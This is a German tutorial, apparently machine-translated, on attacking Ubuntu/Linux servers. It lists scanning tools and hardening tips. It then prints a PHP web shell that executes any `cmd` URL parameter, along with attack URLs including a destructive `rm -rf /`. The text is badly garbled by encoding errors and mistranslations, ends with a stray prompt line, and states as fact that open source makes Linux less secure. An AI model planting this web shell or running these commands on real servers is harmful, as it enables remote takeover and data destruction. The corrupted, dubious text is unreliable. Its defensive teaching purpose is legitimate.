Linux-Betriebssystem hacken: Hacken mit Ubuntu (Befehls-Tutorial)

Linux ist das am weitesten verbreitete Server-Betriebssystem, insbesondere fรผr Webserver. Es ist Open Source, d. h. jeder kann auf den Quellcode zugreifen. Dies macht es im Vergleich zu anderen Betriebssystemen weniger sicher, da Angreifer den Quellcode untersuchen kรถnnen, um Schwachstellen zu finden. Linux Bei โ€žHackersโ€œ geht es darum, diese Schwachstellen auszunutzen, um sich unbefugten Zugriff auf ein System zu verschaffen.

In diesem Artikel stellen wir Ihnen vor, was Linux ist und welche Sicherheitslรผcken es beim Hacken gibt Ubuntu und welche GegenmaรŸnahmen Sie ergreifen kรถnnen.

Kurzer Hinweis zu Linux

Linux ist ein Open Source-Betriebssystem. Es gibt viele Distributionen von Linux-basierten Betriebssystemen wie Redhat, Fedora und Ubuntuusw. Im Gegensatz zu anderen Betriebssystemen ist Linux in Sachen Sicherheit weniger sicher. Dies liegt daran, dass der Quellcode frei verfรผgbar ist, sodass er im Vergleich zu anderen Betriebssystemen, die nicht Open Source sind, leicht auf Schwachstellen untersucht und ausgenutzt werden kann. Linux kann als Betriebssystem fรผr Server, Desktops, Tablets oder Mobilgerรคte verwendet werden.

Linux-Programme kรถnnen entweder รผber GUI oder Befehle bedient werden. Die Linux-Befehle fรผr Kali Linux Hacking sind effektiver und effizienter als die Verwendung der GUI. Aus diesem Grund ist es hilfreich, grundlegende Linux-Befehle zum Hacken zu kennen.

Sehen Sie sich diese Tutorials an https://www.guru99.com/unix-linux-tutorial.html wie man damit anfรคngt Kali Linux Hacks.

Linux-Hacking-Tools

  • Nessusโ€“ Dieses Tool kann verwendet werden fรผr Ubuntu Hacken, Konfigurationseinstellungen, Patches und Netzwerke scannen usw. finden Sie unter https://www.tenable.com/products/nessus
  • NKarte. Mit diesem Tool kรถnnen Hosts รผberwacht werden, die auf dem Server ausgefรผhrt werden, sowie die von ihnen genutzten Dienste. Es kann auch zum Scannen nach Ports verwendet werden. Es ist zu finden unter https://nmap.org/
  • SARA - SARA ist die Abkรผrzung fรผr Security Auditor's Research Assistant. Wie der Name schon sagt, kann dieses Tool verwendet werden, um Netzwerke auf Bedrohungen wie zu รผberprรผfen SQL Injection, XSS usw. finden Sie unter http://www-arc.com/sara/sara.html

Die obige Liste ist nicht vollstรคndig; Es gibt Ihnen eine Vorstellung von den verfรผgbaren Werkzeugen Ubuntu Hacken und Hacken von Linux-Systemen.

So verhindern Sie Linux-Hacks

Linux-Hacking nutzt die Schwachstellen des Betriebssystems aus. Eine Organisation kann die folgende Richtlinie anwenden, um sich vor solchen Angriffen zu schรผtzen.

  • Patch-Managementโ€“ Patches beheben Fehler, die Angreifer ausnutzen, um ein System zu kompromittieren. Eine gute Patch-Management-Richtlinie stellt sicher, dass Sie stรคndig relevante Patches auf Ihr System anwenden.
  • Richtige Betriebssystemkonfigurationโ€“ Andere Exploits nutzen die Schwรคchen in der Konfiguration des Servers aus. Inaktive Benutzernamen und Daemons sollten deaktiviert werden. Standardeinstellungen wie allgemeine Passwรถrter fรผr Anwendungen, Standardbenutzernamen und einige Portnummern sollten geรคndert werden.
  • Intrusion Detection Systemโ€“ Mit solchen Tools kรถnnen unbefugte Zugriffe auf das System erkannt werden. Einige Tools verfรผgen รผber die Fรคhigkeit, solche Angriffe zu erkennen und zu verhindern.

Hacking-Aktivitรคt: Hack a Ubuntu Linux-System mit PHP

In diesem praktischen Szenario lernen wir, wie man mit hackt Ubuntu und wir stellen Ihnen grundlegende Informationen zur Verwendung zur Verfรผgung PHP ein Linux kompromittieren. Wir werden kein Opfer ins Visier nehmen. Wenn Sie es ausprobieren mรถchten, kรถnnen Sie LAMPP auf Ihrem lokalen Computer installieren.

PHP verfรผgt รผber zwei Funktionen, mit denen Linux-Hacking-Befehle ausgefรผhrt werden kรถnnen. Es verfรผgt รผber die Funktionen exec() und shell_exec(). Die Funktion exec() gibt die letzte Zeile der Befehlsausgabe zurรผck, wรคhrend shell_exec() das gesamte Ergebnis des Befehls als String zurรผckgibt.

Zu Demonstrationszwecken nehmen wir an, dass es dem Angreifer gelingt, die folgende Datei auf einen Webserver hochzuladen.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HIER,

Das obige Skript ruft den Befehl von der GET-Variablen namens cmd ab. Der Befehl wird mit shell_exec() ausgefรผhrt und die Ergebnisse werden im Browser zurรผckgegeben.

Der obige Code kann mithilfe der folgenden Methoden ausgenutzt werden: URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HIER,

  • โ€žโ€ฆkonsole.php?cmd=ls%20-lโ€œweist der Variablen cmd den Wert ls โ€“l zu.

Der Befehl in Ubuntu zum Hacken gegen den Server wird ausgefรผhrt als

shell_exec('ls -l') ;

Die Ausfรผhrung des obigen Codes auf einem Webserver fรผhrt zu Ergebnissen รคhnlich den folgenden.

Hack a Ubuntu Linux-System mit PHP

Der obige Befehl zeigt einfach die Dateien im aktuellen Verzeichnis und die Berechtigungen an

Nehmen wir an, der Angreifer gibt den folgenden Befehl ein

rm -rf /

HIER,

  • โ€žrmโ€œ entfernt die Dateien
  • โ€žrfโ€œ bewirkt, dass der Befehl rm in einem rekursiven Modus ausgefรผhrt wird. Alle Ordner und Dateien lรถschen
  • โ€ž/โ€œ weist den Befehl an, mit dem Lรถschen von Dateien aus dem Stammverzeichnis zu beginnen

Der Angriff URL wรผrde ungefรคhr so โ€‹โ€‹aussehen

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Zusammenfassung

  • Linux ist ein beliebtes Betriebssystem fรผr Server, Desktops, Tablets und Mobilgerรคte.
  • Linux ist Open Source und der Quellcode kann von jedem bezogen werden. Dies erleichtert das Erkennen von Schwachstellen. Es ist eines der besten Betriebssysteme fรผr Hacker.
  • Grundlegende und Netzwerk-Hacking-Befehle in Ubuntu sind fรผr Linux-Hacker wertvoll.
  • Schwachstellen sind Schwachstellen, die ausgenutzt werden kรถnnen, um ein System zu kompromittieren.
  • Eine gute Sicherheit kann dazu beitragen, ein System vor der Kompromittierung durch einen Angreifer zu schรผtzen.

Fassen Sie diesen Beitrag mit folgenden Worten zusammen: